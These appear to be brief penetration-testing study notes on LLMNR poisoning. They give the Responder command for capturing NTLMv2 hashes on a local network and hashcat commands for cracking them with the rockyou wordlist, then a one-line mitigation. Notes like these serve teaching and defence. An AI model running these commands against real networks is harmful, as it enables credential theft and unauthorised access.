Untitled

Conducting LLMNR poisoning attack

Step 1: Run Responder

sudo responder -I eth0 -dwP

Untitled

Step 2: Trigger an event

Untitled

Step 3: Hash gets captured

Untitled

Cracking the captured hash

hashcat -m 5600 hahses.txt /usr/share/wordlists/rockyou.txt
#if already cracked use this --show to see the cracked hash
hashcat -m 5600 hahses.txt /usr/share/wordlists/rockyou.txt --show

Untitled

LLMNR Poisoning Mitigation

The best defense in this case is to disable LLMNR and NBT-NS.